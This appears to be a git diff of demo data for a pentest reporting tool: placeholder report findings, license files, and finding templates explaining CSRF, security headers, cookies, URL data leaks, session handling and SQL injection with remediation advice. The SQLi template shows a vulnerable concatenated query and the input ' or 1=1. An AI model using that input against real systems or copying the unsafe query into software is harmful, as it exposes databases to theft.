Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.
Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse
"""
[report_preview_data.report.lead_pentester]
name = "Maxima Mustermensch"
email = "maxima@securitymaximale.com"
phone = "+43 660 123 456 78 "
[[report_preview_data.report.document_history]]
description = "Draft"
date = "2022-07-08"
authors = [
"TODO Author1",
]
version = "0.1"
[[report_preview_data.report.document_history]]
description = "Final Report"
date = "2022-07-08"
authors = [
"TODO Author1",
"TODO Author2",
]
version = "1.0"
[[report_preview_data.findings]]
title = "Demo Finding Critical"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "c5012235-9cd4-475f-86de-0236de1b4b88"
references = [
"https://example.com/reference1",
"https://example.com/reference2",
]
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Also Critical"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "c6a6d51c-999c-4e8c-a506-596689e73f0b"
references = []
retest_notes = ""
retest_status = "open"
affected_components = []
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Medium"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "e685494a-ada0-47cd-aeac-a82dd8fb7dae"
references = []
retest_notes = """
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Reiciendis culpa numquam incidunt eius non natus quos nemo, aspernatur magni praesentium laboriosam illum minima perferendis vero perspiciatis eum nisi. Corporis perspiciatis repudiandae at dolore quo facere, iste earum minima?
Veritatis architecto nihil officiis optio fugit ducimus eveniet commodi tempora perspiciatis, dicta esse voluptatibus expedita officiis, facere perspiciatis id quos animi consequuntur sit nobis similique a nostrum optio, ipsa architecto corrupti est vitae. Quo qui deserunt ea odio exercitationem nobis suscipit illum, ipsam voluptatibus labore impedit vitae aliquid tempora iusto culpa repellat vel sed? Neque iste expedita vero, enim quae corrupti error rerum voluptas cumque autem quasi quia?
"""
retest_status = "open"
affected_components = []
short_recommendation = "maxime illo"
[[report_preview_data.findings]]
title = "Demo Finding Low"
cvss = "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "cd3c3719-8536-43d4-878a-cdb9dc842b70"
references = []
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[report_preview_data.findings]]
title = "Demo Finding Info"
cvss = "n/a"
summary = "TODO summary"
description = "TODO description"
recommendation = "TODO recommendation"
id = "e899b5cf-83d2-48bf-8838-9899246b67fc"
references = [
"https://example.com",
]
retest_notes = ""
retest_status = "open"
affected_components = [
"TODO affected component",
]
short_recommendation = ""
[[assets]]
id = "4c177804-df1c-412f-9e24-d990273029b5"
name = "LICENSE"
[[assets]]
id = "d818fe93-5621-446e-9c20-c8cb1999e3ff"
name = "header-logo.png"
[[assets]]
id = "a8ad4ea9-e13a-4ffd-88c3-e70164f23ef9"
name = "logo-transparent.png"
[[assets]]
id = "3c7d06af-2d0d-481f-83d7-dd7113e6a6d9"
name = "background.svg"

106
demo_data/demo-projects/NOTICE Normal file
View File

@ -0,0 +1,106 @@
This file contains licenses of components used in the HTML/Vue template source code of designs.
vue
MIT
The MIT License (MIT)
Copyright (c) 2018-present, Yuxi (Evan) You
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
chart.js
MIT
The MIT License (MIT)
Copyright (c) 2014-2022 Chart.js Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
chartjs-plugin-datalabels
MIT
The MIT License (MIT)
Copyright (c) 2017-2021 chartjs-plugin-datalabels contributors
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
lodash
MIT
The MIT License
Copyright JS Foundation and other contributors <https://js.foundation/>
Based on Underscore.js, copyright Jeremy Ashkenas,
DocumentCloud and Investigative Reporters & Editors <http://underscorejs.org/>
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/lodash/lodash
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
Copyright and related rights for sample code are waived via CC0. Sample
code is defined as all source code displayed within the prose of the
documentation.
CC0: http://creativecommons.org/publicdomain/zero/1.0/
====
Files located in the node_modules and vendor directories are externally
maintained libraries used by this software which have their own
licenses; we recommend you read them, as their terms may differ from the
terms above.

21
demo_data/demo-projects/calzone-report-demo-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

BIN
demo_data/demo-projects/calzone-report-demo-assets/logo-transparent.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 33 KiB

BIN
demo_data/demo-projects/calzone-report-demo-assets/test.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 35 KiB

1501
demo_data/demo-projects/calzone-report-demo.toml Normal file
View File

File diff suppressed because it is too large Load Diff

21
demo_data/demo-projects/margherita-report-demo-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

BIN
demo_data/demo-projects/margherita-report-demo-assets/background-26185.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 37 KiB

BIN
demo_data/demo-projects/margherita-report-demo-assets/header-logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 24 KiB

BIN
demo_data/demo-projects/margherita-report-demo-assets/logo-transparent.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 18 KiB

BIN
demo_data/demo-projects/margherita-report-demo-images/image.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 6.6 KiB

1406
demo_data/demo-projects/margherita-report-demo.toml Normal file
View File

File diff suppressed because it is too large Load Diff

21
demo_data/demo-projects/oscp-exam-report-demo-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-18239.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 72 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-32877.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 88 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-40126.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.8 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-48948.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 88 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-5026.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 111 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-54644.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 65 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-58203.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 82 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-5838.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 88 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-88002.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 114 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik-96640.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 187 KiB

BIN
demo_data/demo-projects/oscp-exam-report-demo-images/grafik.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 10 KiB

1244
demo_data/demo-projects/oscp-exam-report-demo.toml Normal file
View File

File diff suppressed because it is too large Load Diff

59
demo_data/demo-templates/csrf.toml Normal file
View File

@ -0,0 +1,59 @@
format = "templates/v2"
id = "d6919eb0-0e69-4968-ba99-4c8a8ee108a9"
tags = [
"web",
]
images = []
[[translations]]
id = "9a165150-d953-47e2-8857-ce40443c7ef9"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Cross-Site Request Forgery (CSRF)"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
summary = """
The web application was vulnerable to Cross-Site Request Forgery (CSRF).
CSRF is an attack that causes users to unknowingly send an HTTP request to a web application to which they are currently authenticated.
Attackers can thereby partially bypass a web browser's same-origin policy and perform state-changing actions in the context of an affected user.
Depending on the nature of the action, the attacker can gain complete control over the user's account.
If the user account is administrative, CSRF may also be able to compromise the entire web application.
"""
description = """
We identified a CSRF vulnerability in the web application, allowing them to perform actions in the context of another user.
**TODO: technical description**
Cross-site request forgery (CSRF) is a web security vulnerability in which an attacker can trick an authenticated user into unknowingly sending a state-changing HTTP request to the vulnerable web application.
In CSRF, an attacker assumes the victim's identity and access privileges to perform unwanted actions (e.g., change email address) on their behalf.
Without appropriate CSRF protection, the web application has no way to distinguish between a request prepared by the attacker and a legitimate request from the victim.
Several prerequisites must be in place for a CSRF attack to take place.
First, there must be an action in the web application that is relevant to an attacker and makes sense to exploit.
For example, this could be a privileged action, such as changing a user's access permissions or changing a password.
Another requirement is that there is no other mechanism besides cookie-based authentication to distinguish HTTP requests from different users.
If the user is authenticated and thus has a valid session cookie, the web application thus has no way to distinguish between a malicious, subverted request from the attacker and a legitimate request from the victim.
Last, it must be ensured that actions do not require specific parameters whose values an attacker cannot determine or predict.
For example, if a user is asked to change his password, the function is not vulnerable if an attacker needs to know the value of the existing password.
A common way to exploit CSRF vulnerabilities is through phishing emails.
An attacker does this by preparing malicious links with the intention of foisting a state-changing request on the victim.
The attacker then distributes the malicious links to victims via email.
When a user opens the link in a web browser and is authenticated to it, the request is sent to the vulnerable web application.
If successful, the attack causes an action with the victim's identity and privilege level.
"""
recommendation = """
* Check if the framework has built-in CSRF protection and use it. If not, ensure that all state-changing requests contain a randomly generated CSRF token with high entropy. Also ensure that CSRF tokens are properly validated on the backend.
* Consider various additional security measures:
* For example, set the SameSite attribute for session cookies. Web browsers decide whether to include cookies in cross-site requests based on this attribute.
* Use Custom Request Headers. By default, the browser's same-origin policy restricts JavaScript from submitting cross-site requests with custom request headers.
* For highly sensitive actions, user interactions such as CAPTCHAs, one-time tokens, re-authentication, etc. can also be considered as additional CSRF protection.
* Detailed information and assistance on how to prevent CSRF vulnerabilities can be found in the linked Cross-Site Request Forgery Cheat Sheet from OWASP.
"""
short_recommendation = "Make sure that randomly generated CSRF tokens with high entropy are included in all state-changing HTTP requests and validated in the backend."
references = [
"https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html",
]
affected_components = []

80
demo_data/demo-templates/http_security_headers.toml Normal file
View File

@ -0,0 +1,80 @@
format = "templates/v2"
id = "904173c8-3b5d-4c77-8215-7215f43b61cb"
tags = [
"web",
]
images = []
[[translations]]
id = "9a2703b6-7f81-4f33-8e3d-42136f41f71c"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Incorrectly configured HTTP security headers"
cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
summary = """
The web application did not have important HTTP security headers set or they were configured insecurely.
HTTP security headers are a good way to increase the security of a web application.
They can help make vulnerabilities such as cross-site scripting, clickjacking, information disclosure, and others more difficult or even prevent them altogether.
Without proper HTTP security headers, the potential attack surface of a web application is larger and makes it easier for an attacker to exploit client-side vulnerabilities.
"""
description = """
We checked the HTTP security headers of the examined web application.
The following table provides an overview of which headers were set correctly and which were not:
| Host | Content-Security Policy (CSP) | Referrer-Policy | HTTP-Strict-Transport-Security (HSTS) | X-Content-Type-Options | X-Frame-Options | Permissions-Policy | X-XSS-Protection |
|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|
| TODO | - | - | - | - | - | - |
Modern browsers support several HTTP security headers that can increase the security of web applications against client-side vulnerabilities such as clickjacking, cross-site scripting, and other common attacks.
HTTP Security headers are response headers that specify whether and which security measures should be enabled or disabled in the web browser.
These HTTP headers are exchanged between a browser and a server and specify the security-related details of HTTP communication.
Below is a brief description and overview of the most important current HTTP security headers:
* **Content Security Policy**.
The Content Security Policy (CSP) HTTP header allows fine-grained control over what resources a browser is allowed to obtain resources from.
The CSP header is a very effective measure to prevent the exploitation of cross-site scripting (XSS) vulnerabilities.
* **Referrer Policy**.
The `Referrer-Policy` header determines how and when browsers transmit the HTTP Referer (sic) header.
In the Referer header, a browser informs a target page about the origin of an HTTP request, for example, when a user navigates to a specific page via a link or loads an external resource.
* **HTTP Strict Transport Security (HSTS)**.
With the HSTS header, a web page instructs the browser to connect only over HTTPS.
All unencrypted HTTP requests are transparently redirected in the process.
TLS and certificate-related errors are also handled more strictly by preventing users from bypassing the error page.
* **X-Content-Type-Options**.
The `X-Content-Type-Options` header specifies that browsers will only load scripts and stylesheets if the server specifies the correct MIME type.
Without this header, there is a risk of MIME sniffing.
This means that browsers will misrecognize files as scripts and stylesheets, which could lead to XSS attacks.
* **X-Frame-Options**
`X-Frame-Options` are used to determine if and in which form the web page can be embedded in an iframe.
Clickjacking is a viable attack that can exploit such embedding in an `iframe`.
In such an attack, an attacker overlays the rendering of a legitimate page to then cause users to perform seemingly innocuous interactions (e.g., mouse clicks and/or keystrokes).
* **Permissions policy**
Permissions policy allows web developers to selectively enable, disable, and modify the behavior of certain features and APIs in the browser.
`Permissions-Policy` is similar to Content Security Policy, but controls specific functions of the browser rather than security behavior.
* **X-XSS-Protection**
`X-XSS-Protection` is a feature that prevents pages from loading when a browser detects Reflected Cross-Site Scripting (XSS) attacks.
This header is obsolete when using modern browsers, provided that a secure content security policy has been defined.
"""
recommendation = """
* Do not allow the web page to be included in a frame. Set `X-Frame-Options: DENY` for this. Alternatively you can restrict this setting to the same-origin with `X-Frame-Options: SAMEORIGIN`.
* Set the header `X-XSS-Protection` explicitly with `X-XSS-Protection: 1; mode=block`.
* Prevent the browser from guessing the MIME type based on the content of the resource. Sets the `X-Content-Type-Options` header with the `nosniff` option.
* Restrict the `referrer policy` to prevent potentially sensitive information from being exposed to third party sites. You should define the header as follows: `Referrer-Policy: strict-origin-when-cross-origin`.
* Configure the `Strict-Transport-Security` header so that your web application can only be accessed over a secured HTTPS connection. You should set the header like this: `Strict-Transport-Security: max-age=63072000; includeSubDomains; preload`.
* If possible, define a Content Security Policy (CSP) for your web application CSP is an additional security measure that can make it much more difficult to exploit client-side vulnerabilities. Details on how to configure it securely can be found in the resources.
* Restrict the use of sensitive browser features such as the camera, microphone or speaker using 'Permissions Policy' headers.
"""
short_recommendation = "Follow best practices recommendations for configuring HTTP security headers and implement them for your web application if possible."
references = [
"https://infosec.mozilla.org/guidelines/web_security#content-security-policy",
]
affected_components = []

54
demo_data/demo-templates/insecure_http_cookies.toml Normal file
View File

@ -0,0 +1,54 @@
format = "templates/v2"
id = "9ede86cb-9c01-4b91-93f9-0464bc830321"
tags = [
"web",
"hardening",
]
images = []
[[translations]]
id = "e7472db6-2b8f-4103-9db8-568674cd29c8"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Insecure HTTP cookies"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
summary = """
The issued HTTP cookies of the web application did not have the _HttpOnly_ and/or the _Secure_ cookie attribute set.
If the _HttpOnly_ attribute is not set, the affected cookie can be read or modified client-side using JavaScript.
If the _Secure_ attribute is not set, browsers also send the cookie over unencrypted HTTP connections.
Insecurely configured cookies such as session cookies expand the potential attack surface of a web application.
They make it easier for an attacker to exploit client-side vulnerabilities such as cross-site scripting (XSS) or compromise sessions by trivially intercepting cookies.
"""
description = """
HTTP is a stateless protocol, which means that it cannot distinguish requests from different users without an additional mechanism.
To address this problem, it requires a session mechanism.
The most commonly used mechanism for managing HTTP sessions in browsers is cookie storage.
An HTTP cookie is a small record that a server sends to a user's web browser.
The browser can store the cookie and send it back to the same server for subsequent requests.
This can be used to implement sessions for the stateless HTTP protocol.
An HTTP cookie can be used to distinguish requests from different users and to keep users logged in.
Cookies thus represent a frequent target for attackers.
A web application should therefore harden the configuration of all sensitive cookies.
This can be achieved by setting the _Secure_ and _HttpOnly_ cookie attributes.
A cookie with the _Secure_ attribute will only be sent to the server over HTTPS connections and never over an unsecured HTTP connection.
A cookie with the _HttpOnly_ attribute set is inaccessible to JavaScript and thus helps mitigate cross-site scripting (XSS) attacks.
If an attacker is able to tap sensitive cookies such as session cookies, the attacker could take over user accounts and perform actions in the context of affected users.
An attacker may also be able to gain complete control over all web application functions and data if they take over a user account with privileged access.
We reviewed the set attributes of sensitive HTTP cookies of the web application. The following table provides an overview of the set attributes:
| Cookie | Secure | HttpOnly |
|:---:|:---:|:---:|
| TODO | - |
"""
recommendation = """
* Set the _Secure_ attribute for sensitive cookies. This attribute instructs a browser to send the cookie only over an encrypted HTTPS connection to prevent session ID disclosure through man-in-the-middle attacks.
* If possible, also set the _HttpOnly_ attribute for sensitive cookies. This attribute prevents the cookie from being accessed client-side via JavaScript. This can make session hijacking by XSS attacks more difficult.
"""
short_recommendation = "Make sure that the configuration of all sensitive cookies is hardened and thus important cookie attributes like HttpOnly or Secure are set."
references = []
affected_components = []

41
demo_data/demo-templates/sensitive_data_in_url_parameters.toml Normal file
View File

@ -0,0 +1,41 @@
format = "templates/v2"
id = "e5f017ed-75ee-49c0-8e14-0f46ca606dc1"
tags = [
"web",
]
images = []
[[translations]]
id = "30ef53c4-3aee-4a8e-9099-4313f466b672"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Disclosure of sensitive data in URL parameters"
cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
summary = """
The web application sent sensitive data as URL parameters in HTTP requests.
Data sent as URL parameters is stored in the browser cache and can potentially appear in various other places such as web server logs, referer headers or shared systems.
Third parties could thus gain access to this sensitive data.
"""
description = """
The application sent sensitive data in the URL parameter ''TODO'.
**TODO: technical description**
This could expose the data in the following places:
* Referer Header
* Web Logs
* Shared Systems
* Browser History
* Browser Cache
* Shoulder Surfing
"""
recommendation = """
* The application should send all sensitive data in the body of an HTTP message, e.g. in the body of a POST request.
* Furthermore, the transmission should be secured via encrypted communication via HTTPS.
"""
short_recommendation = "To protect sensitive data from access by third parties, it should be sent in the body of an HTTP message, e.g. via POST request."
references = []
affected_components = []

38
demo_data/demo-templates/session_management_weaknesses.toml Normal file
View File

@ -0,0 +1,38 @@
format = "templates/v2"
id = "ad8385a7-9a58-41a5-937f-6e5f1bfef9e4"
tags = [
"web",
"hardening",
"external",
"config",
]
images = []
[[translations]]
id = "3aeab6d6-b2e5-4905-b43b-f92a8432ac85"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "Session management weaknesses"
cvss = "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
summary = """
We were able to identify weaknesses in the web application's session management.
The users' sessions were usable without time restrictions and therefore did not require re-authentication at any time.
People with access to a computer system could exploit this situation if another user had not explicitly logged out of the application beforehand.
"""
description = """
We could determine that user sessions were usable without time restrictions.
This could allow attackers to take over user sessions that were not explicitly logged out beforehand.
This could be possible, for example, by allowing a third person to operate a user's computer in which a session is still active.
In addition, it could be possible for attackers to reuse session tokens when they become known (e.g. via log files; locally or on proxy servers, etc.).
"""
recommendation = """
* User sessions in web applications should time out automatically after a certain period of inactivity.
* Depending on the criticality of the user authorization and the application, the timeout could be approximately between one hour and one day.
"""
short_recommendation = "Users should be logged out automatically after a certain period of inactivity."
references = []
affected_components = []

79
demo_data/demo-templates/sqli.toml Normal file
View File

@ -0,0 +1,79 @@
format = "templates/v2"
id = "b2d2ed06-b305-401f-88a6-369083d0ac46"
tags = [
"web",
]
images = []
[[translations]]
id = "d20f4ab3-0588-4f69-8339-ef84101753d9"
is_main = true
language = "en-US"
status = "finished"
[translations.data]
title = "SQL Injection (SQLi)"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
summary = """
The web application processed user input in an insecure manner and was thus vulnerable to SQL injection.
In an SQL injection attack, special input values in the web application are used to influence the application's SQL statements to its database.
Depending on the database used and the design of the application, this may make it possible to read and modify the data stored in the database, perform administrative actions (e.g., shut down the DBMS), or in some cases even gain code execution and the accompanying complete control over the vulnerable server.
"""
description = """
We identified an SQL injection vulnerability in the web application and were able to access stored data in the database as a result.
**TODO: technical description**
SQL Injection is a common server-side vulnerability in web applications.
It occurs when software developers create dynamic database queries that contain user input.
In an attack, user input is crafted in such a way that the originally intended action of an SQL statement is changed.
SQL injection vulnerabilities result from an application's failure to dynamically create database queries insecurely and to properly validate user input.
They are based on the fact that the SQL language basically does not distinguish between control characters and data characters.
In order to use a control character in the data part of an SQL statement, it must be encoded or escaped appropriately beforehand.
An SQL injection attack is therefore essentially carried out by inserting a control character such as `'` (single apostrophe) into the user input to place new commands that were not present in the original SQL statement.
A simple example will demonstrate this process.
The following SELECT statement contains a variable userId.
The purpose of this statement is to get data of a user with a specific user id from the Users table.
```python
sqlStmnt = 'SELECT * FROM Users WHERE UserId = ' + userId;
```
An attacker could now use special user input to change the original intent of the SQL statement.
For example, he could use the string `' or 1=1` as user input.
In this case, the application would construct the following SQL statement:
```python
sqlStmnt = 'SELECT * FROM Users WHERE UserId = ' + ' or 1=1;
```
Instead of the data of a user with a specific user ID, the data of all users in the table is now returned to the attacker after executing the statement.
This gives an attacker the ability to control the SQL statement in his own favor.
There are a number of variants of SQL injection vulnerabilities, attacks and techniques that occur in different situations and depending on the database system used.
However, what they all have in common is that, as in the example above, user input is always used to dynamically construct SQL statements.
Successful SQL injection attacks can have far-reaching consequences.
One would be the loss of confidentiality and integrity of the stored data.
Attackers could gain read and possibly write access to sensitive data in the database.
SQL injection could also compromise the authentication and authorization of the web application, allowing attackers to bypass existing access controls.
